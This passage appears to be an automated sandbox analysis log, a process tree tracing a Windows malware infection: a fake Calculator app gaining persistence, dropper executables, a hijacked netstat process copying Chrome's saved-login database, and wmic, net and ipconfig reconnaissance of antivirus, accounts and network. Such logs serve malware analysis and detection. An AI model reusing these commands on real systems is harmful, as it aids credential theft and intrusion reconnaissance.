                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Adds Run key to start application
                                                                            PID:5948
                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                              10⤵
                                                                              • Checks computer location settings
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:200
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x194,0x1e8,0x7ff8538fdec0,0x7ff8538fded0,0x7ff8538fdee0
                                                                                11⤵
                                                                                • Loads dropped DLL
                                                                                PID:3772
                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff649169e70,0x7ff649169e80,0x7ff649169e90
                                                                                  12⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:3168
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=1896 /prefetch:8
                                                                                11⤵
                                                                                • Loads dropped DLL
                                                                                PID:4120
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=1884 /prefetch:8
                                                                                11⤵
                                                                                • Loads dropped DLL
                                                                                PID:5764
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1836 /prefetch:2
                                                                                11⤵
                                                                                • Loads dropped DLL
                                                                                PID:3400
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2568 /prefetch:1
                                                                                11⤵
                                                                                • Checks computer location settings
                                                                                • Loads dropped DLL
                                                                                PID:2248
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                11⤵
                                                                                • Checks computer location settings
                                                                                • Loads dropped DLL
                                                                                PID:4260
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3088 /prefetch:2
                                                                                11⤵
                                                                                • Loads dropped DLL
                                                                                PID:6520
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=3240 /prefetch:8
                                                                                11⤵
                                                                                  PID:6860
                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=3404 /prefetch:8
                                                                                  11⤵
                                                                                    PID:7792
                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=3560 /prefetch:8
                                                                                    11⤵
                                                                                      PID:8560
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=3560 /prefetch:8
                                                                                      11⤵
                                                                                        PID:8604
                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=3540 /prefetch:8
                                                                                        11⤵
                                                                                          PID:8416
                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=3392 /prefetch:8
                                                                                          11⤵
                                                                                            PID:7388
                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,6504574650785134834,459541055925368230,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_1385234757" --mojo-platform-channel-handle=1404 /prefetch:8
                                                                                            11⤵
                                                                                              PID:4148
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
                                                                                  5⤵
                                                                                    PID:3684
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
                                                                                    5⤵
                                                                                      PID:904
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
                                                                                      5⤵
                                                                                        PID:1480
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
                                                                                        5⤵
                                                                                          PID:376
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
                                                                                          5⤵
                                                                                            PID:2612
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:484
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2128
                                                                                    • C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                      "C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                      2⤵
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Drops file in Program Files directory
                                                                                      • Gathers network information
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:3252
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /c del "C:\Users\Admin\Pictures\Adobe Films\HXelwU3wbGkO35MbXuLjAWJB.exe"
                                                                                        3⤵
                                                                                          PID:5776
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                          3⤵
                                                                                            PID:6944
                                                                                          • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            3⤵
                                                                                              PID:7016
                                                                                          • C:\Users\Admin\AppData\Local\Temp\66CB.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\66CB.exe
                                                                                            2⤵
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:6756
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            cmd
                                                                                            2⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:2448
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                              3⤵
                                                                                                PID:2168
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                3⤵
                                                                                                  PID:6088
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                  3⤵
                                                                                                    PID:5928
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                    3⤵
                                                                                                      PID:6560
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                      3⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5932
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                      3⤵
                                                                                                        PID:7484
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                        3⤵
                                                                                                          PID:7516
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                          3⤵
                                                                                                            PID:7880
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                            3⤵
                                                                                                              PID:3844
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                              3⤵
                                                                                                                PID:5752
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                                3⤵
                                                                                                                  PID:8012
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                                  3⤵
                                                                                                                    PID:8240
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                                    3⤵
                                                                                                                      PID:5760
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                                      3⤵
                                                                                                                        PID:8800
                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                        ipconfig /displaydns
                                                                                                                        3⤵
                                                                                                                        • Gathers network information
                                                                                                                        PID:5180
                                                                                                                      • C:\Windows\system32\ROUTE.EXE
                                                                                                                        route print
                                                                                                                        3⤵
                                                                                                                          PID:4308
                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                          netsh firewall show state
                                                                                                                          3⤵
                                                                                                                            PID:8132
                                                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                                                            systeminfo
                                                                                                                            3⤵
                                                                                                                            • Gathers system information
                                                                                                                            PID:4572
                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                            tasklist /v
                                                                                                                            3⤵
                                                                                                                            • Enumerates processes with tasklist
                                                                                                                            PID:4988
                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                            net accounts /domain
                                                                                                                            3⤵
                                                                                                                              PID:7936
                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                C:\Windows\system32\net1 accounts /domain
                                                                                                                                4⤵
                                                                                                                                  PID:6484
                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                net share
                                                                                                                                3⤵
                                                                                                                                  PID:3016
                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                    C:\Windows\system32\net1 share
                                                                                                                                    4⤵
                                                                                                                                      PID:9160
                                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                                    net user
                                                                                                                                    3⤵
                                                                                                                                      PID:4936
                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                        C:\Windows\system32\net1 user
                                                                                                                                        4⤵
                                                                                                                                          PID:8144
                                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                                        net user /domain
                                                                                                                                        3⤵
                                                                                                                                          PID:8852
                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                            C:\Windows\system32\net1 user /domain
                                                                                                                                            4⤵
                                                                                                                                              PID:4384
                                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                                            net use
                                                                                                                                            3⤵
                                                                                                                                              PID:5580
                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                              net group
                                                                                                                                              3⤵
                                                                                                                                                PID:5612
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 group
                                                                                                                                                  4⤵
                                                                                                                                                    PID:3800
                                                                                                                                                • C:\Windows\system32\net.exe
                                                                                                                                                  net localgroup
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6444
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 localgroup
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7668
                                                                                                                                                    • C:\Windows\system32\NETSTAT.EXE
                                                                                                                                                      netstat -r
                                                                                                                                                      3⤵
                                                                                                                                                      • Gathers network information
                                                                                                                                                      PID:7704
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Windows\system32\route.exe" print
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4420
                                                                                                                                                          • C:\Windows\system32\ROUTE.EXE
                                                                                                                                                            C:\Windows\system32\route.exe print
                                                                                                                                                            5⤵
                                                                                                                                                              PID:6400
                                                                                                                                                        • C:\Windows\system32\NETSTAT.EXE
                                                                                                                                                          netstat -nao
                                                                                                                                                          3⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Gathers network information
                                                                                                                                                          PID:4924
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /query
                                                                                                                                                          3⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:2220
                                                                                                                                                        • C:\Windows\system32\ipconfig.exe
                                                                                                                                                          ipconfig /all
                                                                                                                                                          3⤵
                                                                                                                                                          • Gathers network information
                                                                                                                                                          PID:1808
                                                                                                                                                      • C:\Program Files (x86)\B7nwpdxd8\certmgr1bplbn.exe
                                                                                                                                                        "C:\Program Files (x86)\B7nwpdxd8\certmgr1bplbn.exe"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5868
                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Accesses Microsoft Outlook profiles
                                                                                                                                                          • outlook_office_path
                                                                                                                                                          • outlook_win_path
                                                                                                                                                          PID:9060
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6500
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:6796
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:8180
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:9032
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:1168
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:6476
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            2⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:1424
                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2828
                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2684
                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2664
                                                                                                                                                                • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                                                                                  wmiadap.exe /F /T /R
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1096
                                                                                                                                                                • c:\windows\system32\taskhostw.exe
                                                                                                                                                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2496
                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2420
                                                                                                                                                                    • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                                                                                      "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3264
                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:3984
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          PID:5660
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3760
                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 3760 -s 1132
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:7248
                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3528
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:3300
                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2344
                                                                                                                                                                              • c:\windows\system32\sihost.exe
                                                                                                                                                                                sihost.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2324
                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1836
                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1416
                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1204
                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1188
                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1080
                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            PID:760
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                              PID:5024
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              PID:9184
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              PID:7764
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              PID:7560
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Checks SCSI registry key(s)
